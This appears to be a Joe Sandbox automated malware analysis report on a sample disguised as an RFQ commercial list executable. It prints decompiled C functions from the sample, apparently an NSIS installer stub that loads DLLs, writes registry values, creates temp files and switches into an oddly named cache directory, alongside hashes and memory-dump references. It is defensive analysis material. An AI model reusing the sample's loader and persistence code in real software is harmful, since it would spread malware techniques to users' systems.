                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                  • String ID: 7580360$u
                                                                                                                                                                                  • API String ID: 2987980305-3560708192
                                                                                                                                                                                  • Opcode ID: 1a2ef164576304fce7f33f4b5dd228768185c4b37ba6d35ae9c09ff2fb80d3f0
                                                                                                                                                                                  • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a2ef164576304fce7f33f4b5dd228768185c4b37ba6d35ae9c09ff2fb80d3f0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040605A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 737 40605a-40607a GetSystemDirectoryA 738 40607c 737->738 739 40607e-406080 737->739 738->739 740 406090-406092 739->740 741 406082-40608a 739->741 743 406093-4060c5 wsprintfA LoadLibraryExA 740->743 741->740 742 40608c-40608e 741->742 742->743
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E0040605A(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                                                                                                                                  0x00406071
                                                                                                                                                                                  0x0040607a
                                                                                                                                                                                  0x0040607c
                                                                                                                                                                                  0x0040607c
                                                                                                                                                                                  0x00406080
                                                                                                                                                                                  0x00406092
                                                                                                                                                                                  0x0040608c
                                                                                                                                                                                  0x0040608c
                                                                                                                                                                                  0x0040608c
                                                                                                                                                                                  0x00406096
                                                                                                                                                                                  0x004060aa
                                                                                                                                                                                  0x004060be
                                                                                                                                                                                  0x004060c5

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                                                                                                                  • wsprintfA.USER32 ref: 004060AA
                                                                                                                                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                  • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                                  • API String ID: 2200240437-4240819195
                                                                                                                                                                                  • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                                                                                                  • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                                                                                                  • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 744 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 751 4023b0-4023b8 744->751 752 4028cf-4028de 744->752 754 4023c8-4023cb 751->754 755 4023ba-4023c7 call 402a3a lstrlenA 751->755 757 4023db-4023de 754->757 758 4023cd-4023da call 402a1d 754->758 755->754 762 4023e0-4023ea call 402e9f 757->762 763 4023ef-402403 RegSetValueExA 757->763 758->757 762->763 766 402405 763->766 767 402408-4024de RegCloseKey 763->767 766->767 767->752 769 4026a6-4026ad 767->769 769->752
                                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                                  			E00402364(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				long _t22;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B2F(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A3A(2);
				_t18 = E00402A3A(0x11);
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x42e4b0 | 0x00000002, _t27, _t37 + 8, _t27); // executed
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A3A(0x23);
						_t19 = lstrlenA(0x409c10) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A1D(3);
						 *0x409c10 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E9F( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x409c10, 0xc00);
					}
					_t22 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x409c10, _t19); // executed
					if(_t22 == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey(); // executed
				}
				 *0x42e488 =  *0x42e488 +  *(_t37 - 4);
				return 0;
			}











                                                                                                                                                                                  0x00402365
                                                                                                                                                                                  0x0040236a
                                                                                                                                                                                  0x00402374
                                                                                                                                                                                  0x0040237e
                                                                                                                                                                                  0x00402381
                                                                                                                                                                                  0x0040239b
                                                                                                                                                                                  0x004023a2
                                                                                                                                                                                  0x004023aa
                                                                                                                                                                                  0x004023b8
                                                                                                                                                                                  0x004023bc
                                                                                                                                                                                  0x004023c7
                                                                                                                                                                                  0x004023c7
                                                                                                                                                                                  0x004023cb
                                                                                                                                                                                  0x004023cf
                                                                                                                                                                                  0x004023d5
                                                                                                                                                                                  0x004023da
                                                                                                                                                                                  0x004023da
                                                                                                                                                                                  0x004023de
                                                                                                                                                                                  0x004023ea
                                                                                                                                                                                  0x004023ea
                                                                                                                                                                                  0x004023fb
                                                                                                                                                                                  0x00402403
                                                                                                                                                                                  0x00402405
                                                                                                                                                                                  0x00402405
                                                                                                                                                                                  0x00402408
                                                                                                                                                                                  0x004024d8
                                                                                                                                                                                  0x004024d8
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x004028de

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq51C5.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                                                                                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsq51C5.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq51C5.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp
                                                                                                                                                                                  • API String ID: 1356686001-3190579074
                                                                                                                                                                                  • Opcode ID: 073350e17785a7ab59672ca86e6ad19fc6b5000fbac61b24994e09f1b8e299bb
                                                                                                                                                                                  • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 073350e17785a7ab59672ca86e6ad19fc6b5000fbac61b24994e09f1b8e299bb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004059D1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 770 4059d1-4059db 771 4059dc-405a07 GetTickCount GetTempFileNameA 770->771 772 405a16-405a18 771->772 773 405a09-405a0b 771->773 775 405a10-405a13 772->775 773->771 774 405a0d 773->774 774->775
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E004059D1(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x4093ac; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                                                                                                                                                  0x004059d5
                                                                                                                                                                                  0x004059db
                                                                                                                                                                                  0x004059dc
                                                                                                                                                                                  0x004059dc
                                                                                                                                                                                  0x004059e1
                                                                                                                                                                                  0x004059e2
                                                                                                                                                                                  0x004059e5
                                                                                                                                                                                  0x004059ef
                                                                                                                                                                                  0x004059fc
                                                                                                                                                                                  0x004059ff
                                                                                                                                                                                  0x00405a07
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405a0b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405a0d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405a0d
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 004059E5
                                                                                                                                                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • "C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe", xrefs: 004059D1
                                                                                                                                                                                  • nsa, xrefs: 004059DC
                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                                                                  • String ID: "C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                  • API String ID: 1716503409-1798153228
                                                                                                                                                                                  • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                                                                                  • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                                                                                                                                                  • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                                                                                  • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                                                  			E100016BD(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001556);
				_push("true");
				_t34 = E10001A5D();
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E100021B0(_t50);
					}
					E100021FA(_t65, _t50);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100023DA(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x818; // 0x818
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E10001559(_t50);
								_t15 = _t50 + 0x818; // 0x818
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
								 *_t70 = 3;
								E100023DA(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100023DA(_t50);
							_t34 = GlobalFree(E10001266(E10001559(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E100023A0(_t50);
							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x808);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
								_t34 = E100014E2( *0x10004058);
							}
						}
						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002AA3(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E100027E8(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002589(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

















                                                                                                                                                                                  0x100016bd
                                                                                                                                                                                  0x100016bd
                                                                                                                                                                                  0x100016bd
                                                                                                                                                                                  0x100016c7
                                                                                                                                                                                  0x100016cf
                                                                                                                                                                                  0x100016dc
                                                                                                                                                                                  0x100016ea
                                                                                                                                                                                  0x100016ed
                                                                                                                                                                                  0x100016ef
                                                                                                                                                                                  0x100016f4
                                                                                                                                                                                  0x100016f9
                                                                                                                                                                                  0x1000180c
                                                                                                                                                                                  0x1000180c
                                                                                                                                                                                  0x100016ff
                                                                                                                                                                                  0x10001703
                                                                                                                                                                                  0x10001706
                                                                                                                                                                                  0x1000170b
                                                                                                                                                                                  0x1000170d
                                                                                                                                                                                  0x10001713
                                                                                                                                                                                  0x10001719
                                                                                                                                                                                  0x10001749
                                                                                                                                                                                  0x10001750
                                                                                                                                                                                  0x10001774
                                                                                                                                                                                  0x100017b3
                                                                                                                                                                                  0x10001776
                                                                                                                                                                                  0x10001776
                                                                                                                                                                                  0x10001777
                                                                                                                                                                                  0x1000177a
                                                                                                                                                                                  0x10001780
                                                                                                                                                                                  0x10001784
                                                                                                                                                                                  0x10001787
                                                                                                                                                                                  0x1000178c
                                                                                                                                                                                  0x1000178c
                                                                                                                                                                                  0x10001793
                                                                                                                                                                                  0x10001799
                                                                                                                                                                                  0x1000179f
                                                                                                                                                                                  0x100017ab
                                                                                                                                                                                  0x100017ac
                                                                                                                                                                                  0x100017af
                                                                                                                                                                                  0x10001752
                                                                                                                                                                                  0x10001753
                                                                                                                                                                                  0x10001768
                                                                                                                                                                                  0x10001768
                                                                                                                                                                                  0x100017bd
                                                                                                                                                                                  0x100017c0
                                                                                                                                                                                  0x100017cd
                                                                                                                                                                                  0x100017d4
                                                                                                                                                                                  0x100017dc
                                                                                                                                                                                  0x100017df
                                                                                                                                                                                  0x100017df
                                                                                                                                                                                  0x100017dc
                                                                                                                                                                                  0x100017ec
                                                                                                                                                                                  0x100017f4
                                                                                                                                                                                  0x100017f9
                                                                                                                                                                                  0x100017ec
                                                                                                                                                                                  0x10001801
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001803
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001804
                                                                                                                                                                                  0x10001801
                                                                                                                                                                                  0x1000171d
                                                                                                                                                                                  0x10001720
                                                                                                                                                                                  0x1000173e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001741
                                                                                                                                                                                  0x10001746
                                                                                                                                                                                  0x10001746
                                                                                                                                                                                  0x10001748
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001748
                                                                                                                                                                                  0x10001722
                                                                                                                                                                                  0x10001723
                                                                                                                                                                                  0x1000172b
                                                                                                                                                                                  0x1000172c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x1000172c
                                                                                                                                                                                  0x10001725
                                                                                                                                                                                  0x10001726
                                                                                                                                                                                  0x10001734
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001734
                                                                                                                                                                                  0x10001729
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001729

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                                    • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                                    • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                                                    • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                                                                                                                                    • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                                                                                                                                    • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11531499304.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11531472460.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11531531886.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11531564017.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1791698881-3916222277
                                                                                                                                                                                  • Opcode ID: 676a92eb632660267f66b66a0e8313324764f953d5bc12d8e45a65eb3bf091b8
                                                                                                                                                                                  • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 676a92eb632660267f66b66a0e8313324764f953d5bc12d8e45a65eb3bf091b8
                                                                                                                                                                                  • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                                  			E004015B3(char __ebx) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A3A(0xfffffff0);
				_t13 = E0040583A(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004057CC(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E0040548B(_t28);
						} else {
							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004054A8(_t38) == 0) {
								goto L5;
							} else {
								_t22 = E0040540E(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405D2F("C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\sjoske\\Humlebier\\aesc\\Antioxidanttilskud\\Pellicularia\\Unillusioned", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                                                                                                                                  0x004015b3
                                                                                                                                                                                  0x004015ba
                                                                                                                                                                                  0x004015bd
                                                                                                                                                                                  0x004015c2
                                                                                                                                                                                  0x004015c6
                                                                                                                                                                                  0x004015c8
                                                                                                                                                                                  0x004015d0
                                                                                                                                                                                  0x004015d2
                                                                                                                                                                                  0x004015d4
                                                                                                                                                                                  0x004015d8
                                                                                                                                                                                  0x004015db
